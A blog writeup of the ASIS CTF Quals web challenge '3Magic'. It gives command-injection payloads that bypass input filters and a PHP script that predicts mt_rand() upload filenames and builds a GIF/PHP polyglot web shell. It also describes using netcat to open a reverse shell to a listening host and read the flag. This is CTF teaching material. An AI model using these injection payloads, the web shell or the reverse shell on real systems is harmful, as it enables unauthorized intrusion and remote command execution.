Writeup – 3Magic (ASIS CTF Quals)

This weekend, I participated in the ASIS CTF Qualifier (I also participated in a reasonable amount of drinking, but this is another story entirely). One of the challenges which we encountered in this CTF was the “3Magic” challenge, which was a very nice web challenge.

This challenge began as your typical web CTF:

much typical. many internet points.

Putting in an IP address gives you the output of the “ping” command, so we figured our first step was command injection:

many pings. all the pings.

Unfortunately, we quickly ran into some hurdles around restricted characters: spaces were blocked (but brace expansion gets around this, since the shell expands {ls,-la} to ls -la before running it), and input was limited to 15 characters.

‘cat’ing “index.php” (via &cat<index.ph\p: the & terminates the ping command, the < feeds the file to cat without needing a space, and the backslash is dropped by the shell, so the path still resolves to index.php while the request never contains the literal string “php”) revealed that there was a second page (“pages/Adm1n1sTraTi0n2.php”), which was a pretty straightforward setup: it took a file upload, and seemed to pass it through ImageMagick’s identify utility. I tried ImageTragick with SVG and MVG, but it didn’t work – a little Googling showed that PHP scripts would often use getimagesize(), which wouldn’t work on SVGs or MVGs, but we weren’t sure.

Coming back to the “ping” utility, we figured we needed a way to retrieve the source code of the other pages. We tried every Linux trick we knew (protip: not many), but {grep,-nrw,.} worked in performing the equivalent of a recursive ‘cat’: it expands to grep -nrw ., which searches the current directory recursively and prints every matching line prefixed with its filename and line number, so the whole source tree comes back in one response:

i like source code

A little bit of scrolling later, and we get to the source code of the “pages/Adm1n1sTraTi0n2.php” page:

admin2 src pls

Here, we can immediately identify three vulnerabilities:

  • The page saves files to a fixed path format, with the only unknown part being a single mt_rand() output
  • The page leaks the result of a previous call to mt_rand() in a cookie, “test”
  • The page seeds mt_rand() using a broken algorithm – more on this later.

We can also confirm that getimagesize() is blocking our use of SVG against ImageMagick (I’m not sure I believe the “/usr/bin/file -b” call: I’ve never seen that command produce output like “identify” does, which is what we saw).

With this information, we should be able to predict the filename of uploaded files, upload PHP code appended to a legitimate image (remember getimagesize(): the file must still parse as an image, but anything after the image header is ignored by the check and still executed by PHP) and access it directly. The process for doing this is simple:

  • Brute force the seed passed to mt_srand()
  • Call mt_rand() once and check that it equals the value in our ‘test’ cookie.
  • Call mt_rand() again; this output is used to construct the full path that our upload is saved to.
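Putting those three steps together, as an added example (this is a reconstruction, not the author’s script from the screenshot below). The cookie name “test” comes from the writeup; the upload path uploads/<n>.gif, the seed search bound and the GIF-header trick for satisfying getimagesize() are assumptions. The one caveat that bites in practice: PHP 7.1 changed the mt_rand() output stream, so the brute-forcer must run on the same PHP major version as the target or every prediction will be wrong.

```php
<?php
// Added example, not the author's script: recover the mt_srand() seed from one
// leaked mt_rand() value, then predict the next output, which names the upload.
//
// Labelled assumptions (the writeup does not give these details):
//  * the leaked value is the integer in the "test" cookie ((int)$_COOKIE['test']);
//  * the upload is stored as uploads/<mt_rand()>.gif;
//  * the seed space is small enough to brute force because the seeding is
//    "broken" (the writeup says so without giving the algorithm), so the
//    search bound below is a parameter rather than the full 32-bit space.
//
// Run this on the same PHP major version as the target: PHP 7.1 changed the
// mt_rand() output stream, so a seed recovered under 5.x/7.0 predicts nothing
// for a 7.1+ target, and vice versa.

function recover_seed($leaked, $max_seed)
{
    $candidates = array();
    for ($seed = 0; $seed <= $max_seed; $seed++) {
        mt_srand($seed);
        if (mt_rand() === $leaked) {
            $candidates[] = $seed;   // 31-bit outputs can collide: keep every hit
        }
    }
    return $candidates;
}

function predict_after_leak($seed, $skip)
{
    mt_srand($seed);
    for ($i = 0; $i < $skip; $i++) {
        mt_rand();               // replay the outputs the target already consumed (the leak)
    }
    return mt_rand();            // the next output: the one that names the file
}

function polyglot_payload($php)
{
    // getimagesize() only parses the header: "GIF89a", 16-bit width and height,
    // and one flags byte. Everything after that is ignored by the image check
    // but still executed by PHP once the file is included.
    return "GIF89a" . pack('vv', 1, 1) . "\x00" . $php;
}

// Demo with a locally generated leak standing in for the target's "test" cookie.
$max_seed = 100000;
$secret   = mt_rand(0, $max_seed);   // the target's seed, unknown to the attacker
mt_srand($secret);
$cookie_test = mt_rand();            // what the "test" cookie leaks
$real_name   = mt_rand();            // what the target names the upload

foreach (recover_seed($cookie_test, $max_seed) as $seed) {
    $guess = predict_after_leak($seed, 1);
    printf("seed %d -> predicted uploads/%d.gif (%s)\n",
           $seed, $guess, $guess === $real_name ? "correct" : "collision, try the next candidate");
}

// Build the upload and confirm it passes the same check the target applies.
$payload = polyglot_payload("<?php passthru(\$_REQUEST['cmd']); ?>");
$tmp = tempnam(sys_get_temp_dir(), 'poly');
file_put_contents($tmp, $payload);
printf("getimagesize() accepts the polyglot: %s\n", getimagesize($tmp) !== false ? "yes" : "no");
unlink($tmp);
```

If more than one seed reproduces the leaked value, each candidate gives a different predicted path; upload once and request each predicted path until one answers. The prediction only holds if the upload is the very next mt_rand() call after the one that produced the cookie, so the two requests need to go to the same PHP process (or the seeding must be deterministic per request, as the “broken” seeding here allows).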

10 minutes later (most of which were spent figuring out how to get the ‘test’ cookie: for some reason, the application didn’t send us one until we sent it our own ‘test’ cookie first), and we had a PHP script ready:

brute force

Accessing the predicted URL directly gave us a 403 error, but this was easily overcome via index.php’s local file inclusion… feature, which includes the uploaded file from a path the web server won’t serve directly. A small modification to our script, and we’re away:

gotcha you little shit

That said, the flag was still hidden. We then uploaded a PHP passthru($_REQUEST['cmd']); shell, and quickly identified /read_flag and /flag in the root directory. We base64-encoded the /read_flag binary to get it out through the shell, and a little bit of reverse engineering showed that it simply checked for an interactive terminal before giving you the flag.

From here, we sent our PHP shell a command to netcat back to a listening host, converted it to an interactive shell via /bin/sh -i (more on this here; you would be familiar with this problem if you do pwn challenges at all), executed /read_flag, gave it its input and got our flag:

great success!

As always, thanks to the ASIS CTF creators for putting on this fantastic CTF. Judging by the scoreboard, this one tended towards the more difficult end of town – but a fantastic experience nonetheless.

Looking forward to TU-CTF next weekend, thanks to everyone who came on Saturday and made this event a great experience!


About Norman

Sometimes, I write code. Occasionally, it even works.
This entry was posted in Bards, Computers, Jesting.